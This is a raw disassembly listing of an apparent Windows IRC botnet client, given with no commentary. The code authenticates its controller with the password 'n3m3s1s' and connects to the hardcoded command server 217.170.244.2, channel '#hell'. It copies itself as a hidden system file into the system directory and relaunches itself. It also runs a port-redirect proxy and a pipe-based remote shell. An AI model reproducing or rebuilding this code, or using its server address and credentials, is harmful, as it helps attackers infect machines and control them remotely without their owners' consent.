call sub_401F73
loc_40E4AB: ; CODE XREF: sub_4089DC+5204�j
add esp, 24h
loc_40E4AE: ; CODE XREF: sub_4089DC+738�j
; sub_4089DC+744�j ...
mov eax, [ebp+arg_24]
jmp loc_408C5D
; ---------------------------------------------------------------------------
loc_40E4B6: ; CODE XREF: sub_4089DC+7C2�j
; sub_4089DC+7D6�j
mov ebx, [ebp+ebx+var_A4]
test ebx, ebx
mov [ebp+var_8], ebx
jz loc_408C5A
cmp [ebp+var_18], 0
jnz loc_408C5A
push offset asc_427A0C ; "!"
push [ebp+var_A8]
call sub_415289
mov esi, eax
push offset dword_425BC0
push 0
inc esi
call sub_415289
push offset asc_425BBC ; "~"
push eax
call sub_415289
mov edi, [ebp+var_8]
mov ebx, eax
add esp, 18h
mov eax, offset aN3m3s1s ; "n3m3s1s"
loc_40E509: ; CODE XREF: sub_4089DC+5B49�j
mov dl, [eax]
mov cl, dl
cmp dl, [edi]
jnz short loc_40E52B
test cl, cl
jz short loc_40E527
mov dl, [eax+1]
mov cl, dl
cmp dl, [edi+1]
jnz short loc_40E52B
inc eax
inc eax
inc edi
inc edi
test cl, cl
jnz short loc_40E509
loc_40E527: ; CODE XREF: sub_4089DC+5B37�j
xor eax, eax
jmp short loc_40E530
; ---------------------------------------------------------------------------
loc_40E52B: ; CODE XREF: sub_4089DC+5B33�j
; sub_4089DC+5B41�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40E530: ; CODE XREF: sub_4089DC+5B4D�j
test eax, eax
jz short loc_40E57F
push ebx
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_F0]
push eax
push offset aNoticeSPassAut ; "NOTICE %s :Pass auth failed (%s!%s).\r\n"
push [ebp+arg_4]
call sub_405674
lea eax, [ebp+var_F0]
push eax
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4]
call sub_405674
push ebx
push esi
push offset aMainFailedPass ; "[MAIN]: *Failed pass auth by: (%s!%s)."
loc_40E56B: ; CODE XREF: sub_4089DC+5BF6�j
lea eax, [ebp+var_2F0]
push eax
call sub_414415
add esp, 30h
jmp loc_40D9C2
; ---------------------------------------------------------------------------
loc_40E57F: ; CODE XREF: sub_4089DC+5B56�j
xor edi, edi
loc_40E581: ; CODE XREF: sub_4089DC+5BBD�j
push ebx
push off_42BFB8[edi]
call sub_412998
test eax, eax
pop ecx
pop ecx
jnz short loc_40E5D4
add edi, 4
cmp edi, 4
jb short loc_40E581
push ebx
lea eax, [ebp+var_F0]
push eax
lea eax, [ebp+var_F0]
push eax
push offset aNoticeSHostAut ; "NOTICE %s :Host Auth failed (%s!%s).\r\n"
push [ebp+arg_4]
call sub_405674
lea eax, [ebp+var_F0]
push eax
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4]
call sub_405674
push ebx
push esi
push offset aMainFailedHost ; "[MAIN]: *Failed host auth by: (%s!%s)."
jmp short loc_40E56B
; ---------------------------------------------------------------------------
loc_40E5D4: ; CODE XREF: sub_4089DC+5BB5�j
mov edx, [ebp+arg_18]
xor eax, eax
loc_40E5D9: ; CODE XREF: sub_4089DC+5C3F�j
cmp byte ptr [edx], 0
jnz short loc_40E611
mov edi, [ebp+var_8]
mov esi, offset aN3m3s1s ; "n3m3s1s"
loc_40E5E6: ; CODE XREF: sub_4089DC+5C26�j
mov bl, [esi]
mov cl, bl
cmp bl, [edi]
jnz short loc_40E608
test cl, cl
jz short loc_40E604
mov bl, [esi+1]
mov cl, bl
cmp bl, [edi+1]
jnz short loc_40E608
inc esi
inc esi
inc edi
inc edi
test cl, cl
jnz short loc_40E5E6
loc_40E604: ; CODE XREF: sub_4089DC+5C14�j
xor ecx, ecx
jmp short loc_40E60D
; ---------------------------------------------------------------------------
loc_40E608: ; CODE XREF: sub_4089DC+5C10�j
; sub_4089DC+5C1E�j
sbb ecx, ecx
sbb ecx, 0FFFFFFFFh
loc_40E60D: ; CODE XREF: sub_4089DC+5C2A�j
test ecx, ecx
jz short loc_40E622
loc_40E611: ; CODE XREF: sub_4089DC+5C00�j
inc eax
add edx, 80h
cmp eax, 2
jl short loc_40E5D9
jmp loc_408C5A
; ---------------------------------------------------------------------------
loc_40E622: ; CODE XREF: sub_4089DC+5C33�j
shl eax, 7
add eax, [ebp+arg_18]
push 7Fh
lea ecx, [ebp+var_960]
push ecx
push eax
call sub_4144A0
add esp, 0Ch
cmp [ebp+var_C], 0
jnz short loc_40E65B
push 0
push [ebp+var_4]
push offset aMainPasswordAc ; "[MAIN]: Password accepted."
push [ebp+var_A0]
push [ebp+arg_4]
call sub_4056BF
add esp, 14h
loc_40E65B: ; CODE XREF: sub_4089DC+5C62�j
lea eax, [ebp+var_F0]
push eax
push offset aMainUserSLog_1 ; "[MAIN]: User: %s logged in."
loc_40E667: ; CODE XREF: sub_4089DC+6F5�j
; sub_4089DC+4A31�j ...
call sub_401F73
pop ecx
loc_40E66D: ; CODE XREF: sub_4089DC+3693�j
pop ecx
jmp loc_408C5A
; ---------------------------------------------------------------------------
loc_40E673: ; CODE XREF: sub_4089DC+1FA�j
; sub_4089DC+20D�j
push [ebp+arg_10]
push offset aUserhostS ; "USERHOST %s\r\n"
push [ebp+arg_4]
call sub_405674
push offset aIx ; "+ix"
push [ebp+arg_10]
push offset aModeSS ; "MODE %s %s\r\n"
push [ebp+arg_4]
call sub_405674
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_405674
xor eax, eax
add esp, 2Ch
inc eax
mov dword_47BF24, eax
jmp loc_408C5D
sub_4089DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E6BB proc near ; CODE XREF: .text:00416295�p
var_98C = byte ptr -98Ch
var_888 = byte ptr -888h
var_887 = byte ptr -887h
var_6F8 = byte ptr -6F8h
var_5F8 = byte ptr -5F8h
var_4F8 = byte ptr -4F8h
var_3F4 = byte ptr -3F4h
var_2F0 = byte ptr -2F0h
var_1EC = byte ptr -1ECh
var_E8 = byte ptr -0E8h
var_68 = dword ptr -68h
var_5C = dword ptr -5Ch
var_3C = dword ptr -3Ch
var_38 = word ptr -38h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 98Ch
push ebx
xor ebx, ebx
push esi
push edi
mov [ebp+var_10], ebx
mov [ebp+var_C], ebx
mov [ebp+var_8], offset sub_402E5D
push [ebp+var_8]
push large dword ptr fs:0
mov large fs:0, esp
mov esi, ds:dword_420004
call esi ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov dword_47BF18, eax
call esi ; GetTickCount
push eax
call sub_4145C4
pop ecx
call sub_405770
push 2
call dword_4357E0 ; SetErrorMode
push 7530h
push offset aBot014 ; "Bot014"
push ebx
push ebx
call ds:dword_420104 ; CreateMutexA
push eax
call ds:dword_420100 ; WaitForSingleObject
cmp eax, 102h
jnz short loc_40E73A
push 1
jmp loc_40E99A
; ---------------------------------------------------------------------------
loc_40E73A: ; CODE XREF: sub_40E6BB+76�j
lea eax, [ebp+var_888]
push eax
push 202h
call dword_435818 ; WSAStartup
cmp eax, ebx
mov [ebp+var_8], eax
jnz loc_40EC07
cmp [ebp+var_888], 2
jnz loc_40EC01
cmp [ebp+var_887], 2
jnz loc_40EC01
mov esi, 104h
push esi
lea eax, [ebp+var_3F4]
push eax
call ds:dword_420048 ; GetSystemDirectoryA
push esi
lea eax, [ebp+var_2F0]
push eax
push ebx
call ds:dword_4200A4 ; GetModuleHandleA
push eax
call ds:dword_420010 ; GetModuleFileNameA
lea eax, [ebp+var_5F8]
push eax
lea eax, [ebp+var_6F8]
push eax
push ebx
lea eax, [ebp+var_2F0]
push ebx
push eax
call sub_415B3D
lea eax, [ebp+var_5F8]
push eax
lea eax, [ebp+var_6F8]
push eax
push offset aSS ; "%s%s"
lea eax, [ebp+var_4F8]
push esi
push eax
call sub_41466D
lea eax, [ebp+var_3F4]
push eax
lea eax, [ebp+var_2F0]
push eax
call sub_414EE0
add esp, 30h
test eax, eax
jnz loc_40E9A0
cmp dword_47BF1C, ebx
mov esi, offset byte_42BF4C
jz short loc_40E842
mov eax, esi
xor edi, edi
lea ecx, [eax+1]
loc_40E808: ; CODE XREF: sub_40E6BB+152�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_40E808
sub eax, ecx
add eax, 0FFFFFFFAh
test eax, eax
jbe short loc_40E842
loc_40E818: ; CODE XREF: sub_40E6BB+185�j
call sub_4145D1
cdq
push 1Ah
pop ecx
idiv ecx
mov eax, esi
lea ecx, [eax+1]
add dl, 61h
mov byte_42BF4C[edi], dl
inc edi
loc_40E832: ; CODE XREF: sub_40E6BB+17C�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_40E832
sub eax, ecx
add eax, 0FFFFFFFAh
cmp edi, eax
jb short loc_40E818
loc_40E842: ; CODE XREF: sub_40E6BB+144�j
; sub_40E6BB+15B�j
push esi
lea eax, [ebp+var_3F4]
push eax
lea eax, [ebp+var_1EC]
push offset aSS_0 ; "%s\\%s"
push eax
call sub_414415
add esp, 10h
lea eax, [ebp+var_1EC]
push eax
call ds:dword_4200A0 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_40E882
push 80h
lea eax, [ebp+var_1EC]
push eax
call ds:dword_4200CC ; SetFileAttributesA
loc_40E882: ; CODE XREF: sub_40E6BB+1B3�j
mov esi, ds:dword_420000
push 7D0h
call esi ; Sleep
mov edi, ds:dword_4200FC
mov [ebp+var_4], ebx
jmp short loc_40E8BD
; ---------------------------------------------------------------------------
loc_40E89A: ; CODE XREF: sub_40E6BB+215�j
call ds:dword_420008 ; RtlGetLastWin32Error
cmp [ebp+var_4], ebx
jnz short loc_40E8D2
cmp eax, 20h
jz short loc_40E8AF
cmp eax, 5
jnz short loc_40E8D2
loc_40E8AF: ; CODE XREF: sub_40E6BB+1ED�j
push 3A98h
mov [ebp+var_4], 1
call esi ; Sleep
loc_40E8BD: ; CODE XREF: sub_40E6BB+1DD�j
push ebx
lea eax, [ebp+var_1EC]
push eax
lea eax, [ebp+var_2F0]
push eax
call edi ; CopyFileA
test eax, eax
jz short loc_40E89A
loc_40E8D2: ; CODE XREF: sub_40E6BB+1E8�j
; sub_40E6BB+1F2�j
lea eax, [ebp+var_1EC]
push eax
call sub_406931
pop ecx
push 7
lea eax, [ebp+var_1EC]
push eax
call ds:dword_4200CC ; SetFileAttributesA
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
stosd
push 11h
pop ecx
xor eax, eax
lea edi, [ebp+var_68]
rep stosd
xor edi, edi
inc edi
mov [ebp+var_5C], 420AEAh
mov [ebp+var_68], 44h
mov [ebp+var_3C], edi
mov [ebp+var_38], bx
call ds:dword_4200F8 ; GetCurrentProcessId
push eax
push edi
push 100000h
call ds:dword_420078 ; OpenProcess
lea ecx, [ebp+var_2F0]
push ecx
push eax
lea eax, [ebp+var_1EC]
push eax
lea eax, [ebp+var_98C]
push offset aSDS ; "%s %d \"%s\""
push eax
call sub_414415
add esp, 14h
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_3F4]
push eax
push ebx
push 28h
push edi
push ebx
push ebx
lea eax, [ebp+var_98C]
push eax
lea eax, [ebp+var_1EC]
push eax
call ds:dword_420038 ; CreateProcessA
test eax, eax
jz short loc_40E9A6
push 0C8h
call esi ; Sleep
push [ebp+var_24]
mov esi, ds:dword_42003C
call esi ; CloseHandle
push [ebp+var_20]
call esi ; CloseHandle
call dword_435920 ; WSACleanup
push ebx
loc_40E99A: ; CODE XREF: sub_40E6BB+7A�j
call ds:dword_420034 ; ExitProcess
loc_40E9A0: ; CODE XREF: sub_40E6BB+133�j
mov esi, ds:dword_420000
loc_40E9A6: ; CODE XREF: sub_40E6BB+2BF�j
cmp dword_47C1D8, 2
jle short loc_40E9EE
mov eax, dword_47C1DC
push dword ptr [eax+4]
call sub_4147A2
pop ecx
mov edi, eax
push 0FFFFFFFFh
push edi
call ds:dword_420100 ; WaitForSingleObject
push edi
call ds:dword_42003C ; CloseHandle
mov eax, dword_47C1DC
cmp [eax+8], ebx
jz short loc_40E9EE
push 7D0h
call esi ; Sleep
mov eax, dword_47C1DC
push dword ptr [eax+8]
call ds:dword_4200E4 ; DeleteFileA
loc_40E9EE: ; CODE XREF: sub_40E6BB+2F2�j
; sub_40E6BB+31C�j
cmp dword_42BECC, ebx
jz short loc_40EA0B
cmp dword_435968, ebx
jnz short loc_40EA0B
lea eax, [ebp+var_4F8]
push eax
call sub_40213F
pop ecx
loc_40EA0B: ; CODE XREF: sub_40E6BB+339�j
; sub_40E6BB+341�j
lea eax, [ebp+var_E8]
push offset aMainBotStarted ; "[MAIN]: Bot started."
push eax
call sub_414415
push ebx
lea eax, [ebp+var_E8]
push ebx
push eax
call sub_41229A
lea eax, [ebp+var_E8]
push eax
call sub_401EFF
xor eax, eax
mov ecx, 2E0h
mov edi, offset dword_47B398
rep stosd
lea eax, [ebp+var_E8]
push offset aSecureSystemSe ; "[SECURE]: System secure monitor active."...
push eax
call sub_414415
push ebx
lea eax, [ebp+var_E8]
push 1Ah
push eax
call sub_41229A
add esp, 2Ch
mov edi, eax
lea eax, [ebp+var_10]
push eax
push ebx
push ebx
push offset sub_4104D1
push ebx
push ebx
call ds:dword_42000C ; CreateThread
imul edi, 234h
cmp eax, ebx
mov dword_4366B4[edi], eax
jnz short loc_40EAA7
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_E8]
push offset aSecureFailedTo ; "[SECURE]: Failed to start secure thread"...
push eax
call sub_414415
add esp, 0Ch
loc_40EAA7: ; CODE XREF: sub_40E6BB+3CF�j
lea eax, [ebp+var_E8]
push eax
call sub_401EFF
push 7Fh
push offset a217_170_244_2 ; "217.170.244.2"
push offset dword_47B234
mov dword_47BF28, ebx
call sub_4144A0
mov eax, dword_42BEB0
push 3Fh
push offset aHell ; "#hell"
mov esi, offset dword_47B2B4
push esi
mov dword_47B384, eax
call sub_4144A0
push 3Fh
push offset aTroopers ; "troopers"
mov edi, offset dword_47B2F4
push edi
call sub_4144A0
add esp, 28h
mov dword_47B388, ebx
loc_40EB01: ; CODE XREF: sub_40E6BB+4EC�j
; sub_40E6BB+4F7�j ...
mov [ebp+var_4], ebx
loc_40EB04: ; CODE XREF: sub_40E6BB+4A0�j
cmp dword_435980, ebx
jnz short loc_40EB22
push ebx
lea eax, [ebp+var_14]
push eax
call dword_435790 ; InternetGetConnectedState
test eax, eax
jnz short loc_40EB22
push 7530h
jmp short loc_40EB4E
; ---------------------------------------------------------------------------
loc_40EB22: ; CODE XREF: sub_40E6BB+44F�j
; sub_40E6BB+45E�j
push offset dword_47B230
mov dword_47BF24, ebx
call sub_40887D
cmp eax, 2
mov [ebp+var_8], eax
jz loc_40EBFC
cmp dword_47BF24, ebx
jz short loc_40EB49
dec [ebp+var_4]
loc_40EB49: ; CODE XREF: sub_40E6BB+489�j
push 0BB8h
loc_40EB4E: ; CODE XREF: sub_40E6BB+465�j
call ds:dword_420000 ; Sleep
inc [ebp+var_4]
cmp [ebp+var_4], 3
jl short loc_40EB04
cmp [ebp+var_8], 2
jz loc_40EBFC
cmp [ebp+var_C], ebx
jz short loc_40EBAC
push 7Fh
push offset a217_170_244_2 ; "217.170.244.2"
push offset dword_47B234
call sub_4144A0
mov eax, dword_42BEB0
push 3Fh
push offset aHell ; "#hell"
push esi
mov dword_47B384, eax
call sub_4144A0
push 3Fh
push offset aTroopers ; "troopers"
push edi
call sub_4144A0
add esp, 24h
mov [ebp+var_C], ebx
jmp loc_40EB01
; ---------------------------------------------------------------------------
loc_40EBAC: ; CODE XREF: sub_40E6BB+4AF�j
cmp byte_42BF20, bl
jz loc_40EB01
push 7Fh
push offset byte_42BF20
push offset dword_47B234
call sub_4144A0
mov eax, dword_42BEB4
push 3Fh
push offset aHell_1 ; "#hell"
push esi
mov dword_47B384, eax
call sub_4144A0
push 3Fh
push offset aTroopers_0 ; "troopers"
push edi
call sub_4144A0
add esp, 24h
mov [ebp+var_C], 1
jmp loc_40EB01
; ---------------------------------------------------------------------------
loc_40EBFC: ; CODE XREF: sub_40E6BB+47D�j
; sub_40E6BB+4A6�j
call sub_41240B
loc_40EC01: ; CODE XREF: sub_40E6BB+A3�j
; sub_40E6BB+B0�j
call dword_435920 ; WSACleanup
loc_40EC07: ; CODE XREF: sub_40E6BB+96�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
sub_40E6BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40EC10 proc near ; DATA XREF: sub_40ECAB+12C�o
var_1128 = byte ptr -1128h
var_128 = byte ptr -128h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1128h
call sub_414630
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_128]
rep movsd
mov esi, [ebp+var_14]
mov dword ptr [eax+124h], 1
imul esi, 234h
mov ebx, 1000h
jmp short loc_40EC65
; ---------------------------------------------------------------------------
loc_40EC4A: ; CODE XREF: sub_40EC10+7B�j
push 0
push eax
lea eax, [ebp+var_1128]
push eax
push dword_4366AC[esi]
call dword_43589C ; send
cmp eax, 0FFFFFFFFh
jz short loc_40EC8D
loc_40EC65: ; CODE XREF: sub_40EC10+38�j
xor eax, eax
push eax
lea edi, [ebp+var_1128]
mov ecx, 400h
rep stosd
push ebx
lea eax, [ebp+var_1128]
push eax
push dword_4366B0[esi]
call dword_43577C ; recv
test eax, eax
jg short loc_40EC4A
loc_40EC8D: ; CODE XREF: sub_40EC10+53�j
push dword_4366B0[esi]
call dword_435914 ; closesocket
push [ebp+var_14]
call sub_41255E
pop ecx
push 0
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_40EC10 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40ECAB proc near ; DATA XREF: sub_40EE88+118�o
var_1344 = byte ptr -1344h
var_344 = byte ptr -344h
var_144 = byte ptr -144h
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1344h
call sub_414630
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp+var_144]
rep movsd
mov esi, [ebp+var_30]
xor ecx, ecx
inc ecx
push 6
push ecx
push 2
mov [eax+120h], ecx
mov [ebp+var_4], esi
call dword_435808 ; socket
xor ebx, ebx
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz loc_40EE0A
push [ebp+var_3C]
xor eax, eax
lea edi, [ebp+var_18]
stosd
stosd
stosd
stosd
mov [ebp+var_18], 2
call dword_435954 ; htons
mov [ebp+var_16], ax
lea eax, [ebp+var_13C]
push eax
call dword_43587C ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_40ED33
lea eax, [ebp+var_13C]
push eax
call dword_435868 ; gethostbyname
jmp short loc_40ED41
; ---------------------------------------------------------------------------
loc_40ED33: ; CODE XREF: sub_40ECAB+77�j
push 2
push 4
lea eax, [ebp+var_8]
push eax
call dword_4358F8 ; gethostbyaddr
loc_40ED41: ; CODE XREF: sub_40ECAB+86�j
cmp eax, ebx
jz loc_40EE0A
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_14], eax
push 10h
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
call dword_4357C0 ; connect
cmp eax, 0FFFFFFFFh
jz loc_40EE0A
push [ebp+var_34]
movzx eax, [ebp+var_16]
push eax
push [ebp+var_14]
mov [ebp+var_20], ebx
call dword_435888 ; inet_ntoa
push eax
lea eax, [ebp+var_344]
push offset aRedirectClient ; "[REDIRECT]: Client connection to IP: %s"...
push eax
call sub_414415
push [ebp+arg_0]
lea eax, [ebp+var_344]
push 11h
push eax
call sub_41229A
imul esi, 234h
mov ecx, [ebp+var_34]
mov [ebp+var_30], eax
imul eax, 234h
mov dword_4366A4[eax], ecx
add esp, 20h
lea esi, dword_4366AC[esi]
mov ecx, [esi]
mov dword_4366B0[eax], ecx
lea eax, [ebp+var_1C]
push eax
push ebx
lea eax, [ebp+var_144]
push eax
push offset sub_40EC10
push ebx
push ebx
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_30]
imul ecx, 234h
cmp eax, ebx
mov dword_4366B4[ecx], eax
jnz short loc_40EE40
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aRedirectFail_0 ; "[REDIRECT]: Failed to start connection "...
call sub_401F73
pop ecx
pop ecx
loc_40EE0A: ; CODE XREF: sub_40ECAB+42�j
; sub_40ECAB+98�j ...
mov eax, [ebp+var_4]
imul eax, 234h
push dword_4366AC[eax]
call dword_435914 ; closesocket
push [ebp+arg_0]
call dword_435914 ; closesocket
push [ebp+var_4]
call sub_41255E
pop ecx
push ebx
call ds:dword_420014 ; ExitThread
loc_40EE38: ; CODE XREF: sub_40ECAB+198�j
push 32h
call ds:dword_420000 ; Sleep
loc_40EE40: ; CODE XREF: sub_40ECAB+14A�j
cmp [ebp+var_20], ebx
jz short loc_40EE38
jmp short loc_40EE5E
; ---------------------------------------------------------------------------
loc_40EE47: ; CODE XREF: sub_40ECAB+1D9�j
push ebx
push eax
lea eax, [ebp+var_1344]
push eax
push [ebp+arg_0]
call dword_43589C ; send
cmp eax, 0FFFFFFFFh
jz short loc_40EE0A
loc_40EE5E: ; CODE XREF: sub_40ECAB+19A�j
xor eax, eax
push ebx
lea edi, [ebp+var_1344]
mov ecx, 400h
rep stosd
push 1000h
lea eax, [ebp+var_1344]
push eax
push dword ptr [esi]
call dword_43577C ; recv
cmp eax, ebx
jg short loc_40EE47
jmp short loc_40EE0A
sub_40ECAB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40EE88 proc near ; DATA XREF: sub_4089DC+2758�o
var_34C = byte ptr -34Ch
var_14C = byte ptr -14Ch
var_148 = dword ptr -148h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, eax
push 4Ah
pop ecx
lea edi, [ebp+var_14C]
rep movsd
push [ebp+var_40]
xor esi, esi
inc esi
mov [eax+120h], esi
xor eax, eax
lea edi, [ebp+var_10]
stosd
stosd
stosd
stosd
mov [ebp+var_10], 2
call dword_435954 ; htons
push 6
push esi
xor ebx, ebx
push 2
mov [ebp+var_E], ax
mov [ebp+var_C], ebx
mov [ebp+arg_0], 10h
call dword_435808 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_40EFE7
mov eax, [ebp+var_3C]
imul eax, 234h
push esi
push 401h
push ebx
push edi
mov dword_4366AC[eax], edi
call dword_435894 ; WSAAsyncSelect
push 10h
lea eax, [ebp+var_10]
push eax
push edi
call dword_4358E0 ; bind
test eax, eax
jnz loc_40EFE7
push 0Ah
push edi
call dword_435928 ; listen
test eax, eax
jnz loc_40EFE7
loc_40EF2E: ; CODE XREF: sub_40EE88+BA�j
; sub_40EE88+15A�j
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_24]
push eax
push edi
call dword_4357CC ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40EF2E
push [ebp+var_3C]
movzx eax, [ebp+var_22]
push eax
push [ebp+var_20]
mov [ebp+var_148], esi
mov [ebp+var_2C], ebx
call dword_435888 ; inet_ntoa
push eax
lea eax, [ebp+var_34C]
push offset aRedirectClie_0 ; "[REDIRECT]: Client connection from IP: "...
push eax
call sub_414415
push esi
lea eax, [ebp+var_34C]
push 11h
push eax
call sub_41229A
mov ecx, [ebp+var_3C]
mov [ebp+var_38], eax
imul eax, 234h
add esp, 20h
mov dword_4366A4[eax], ecx
lea eax, [ebp+var_14]
push eax
push ebx
lea eax, [ebp+var_14C]
push eax
push offset sub_40ECAB
push ebx
push ebx
call ds:dword_42000C ; CreateThread
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, ebx
mov dword_4366B4[ecx], eax
jnz short loc_40EFDD
call ds:dword_420008 ; RtlGetLastWin32Error
push eax
push offset aRedirectFail_1 ; "[REDIRECT]: Failed to start client thre"...
call sub_401F73
pop ecx
pop ecx
jmp short loc_40EFEA
; ---------------------------------------------------------------------------
loc_40EFD5: ; CODE XREF: sub_40EE88+158�j
push 32h
call ds:dword_420000 ; Sleep
loc_40EFDD: ; CODE XREF: sub_40EE88+136�j
cmp [ebp+var_2C], ebx
jz short loc_40EFD5
jmp loc_40EF2E
; ---------------------------------------------------------------------------
loc_40EFE7: ; CODE XREF: sub_40EE88+5D�j
; sub_40EE88+8F�j ...
mov esi, [ebp+arg_0]
loc_40EFEA: ; CODE XREF: sub_40EE88+14B�j
push esi
call dword_435914 ; closesocket
push edi
call dword_435914 ; closesocket
push [ebp+var_3C]
call sub_41255E
pop ecx
push ebx
call ds:dword_420014 ; ExitThread
int 3 ; Trap to Debugger
sub_40EE88 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40F009 proc near ; CODE XREF: sub_40F039+30�p
; sub_40F077+85�p ...
mov eax, dword_47BF38
cmp eax, 0FFFFFFFFh
push esi
mov esi, ds:dword_42003C
jz short loc_40F01D
push eax
call esi ; CloseHandle
loc_40F01D: ; CODE XREF: sub_40F009+F�j
mov eax, dword_47BF34
cmp eax, 0FFFFFFFFh
jz short loc_40F02A
push eax
call esi ; CloseHandle
loc_40F02A: ; CODE XREF: sub_40F009+1C�j
mov eax, dword_47BF70
cmp eax, 0FFFFFFFFh
jz short loc_40F037
push eax
call esi ; CloseHandle
loc_40F037: ; CODE XREF: sub_40F009+29�j
pop esi
retn
sub_40F009 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F039 proc near ; CODE XREF: sub_4089DC+3845�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea edx, [eax+1]
loc_40F043: ; CODE XREF: sub_40F039+F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40F043
push 0
lea ecx, [ebp+var_4]
push ecx
sub eax, edx
push eax
push [ebp+arg_0]
mov [ebp+var_4], eax
push dword_47BF2C
call ds:dword_420040 ; WriteFile
test eax, eax
jnz short loc_40F072
call sub_40F009
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40F072: ; CODE XREF: sub_40F039+2E�j
xor eax, eax
inc eax
leave
retn
sub_40F039 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F077 proc near ; CODE XREF: sub_40F105+D9�p
; sub_40F105+11F�p ...
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
mov esi, [ebp+arg_4]
xor ecx, ecx
push edi
inc ecx
mov edi, 420AEAh
xor eax, eax
repe cmpsb
pop edi
pop esi
jz short loc_40F0BC
push 0FAh
call ds:dword_420000 ; Sleep
push [ebp+arg_8]
lea eax, [ebp+var_200]
push [ebp+arg_4]
push offset aPrivmsgSS ; "PRIVMSG %s :%s\r"
push eax
call sub_414415
add esp, 10h
jmp short loc_40F0D3
; ---------------------------------------------------------------------------
loc_40F0BC: ; CODE XREF: sub_40F077+1C�j
push [ebp+arg_8]
lea eax, [ebp+var_200]
push offset aS_2 ; "%s"
push eax
call sub_414415
add esp, 0Ch
loc_40F0D3: ; CODE XREF: sub_40F077+43�j
lea eax, [ebp+var_200]
lea edx, [eax+1]
loc_40F0DC: ; CODE XREF: sub_40F077+6A�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40F0DC
push 0
sub eax, edx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call dword_43589C ; send
test eax, eax
jg short loc_40F101
call sub_40F009
loc_40F101: ; CODE XREF: sub_40F077+83�j
xor eax, eax
leave
retn
sub_40F077 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F105 proc near ; DATA XREF: sub_40F292+16A�o
var_20C = byte ptr -20Ch
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
push esi
push edi
xor eax, eax
mov ebx, 80h
mov ecx, ebx
lea edi, [ebp+var_20C]
rep stosd
xor edi, edi
push edi
push edi
lea eax, [ebp+var_4]
push eax
mov esi, 200h
push esi
lea eax, [ebp+var_20C]
push eax
push dword_47BF38
call ds:dword_42010C ; PeekNamedPipe
test eax, eax
jz loc_40F214
jmp short loc_40F14F
; ---------------------------------------------------------------------------
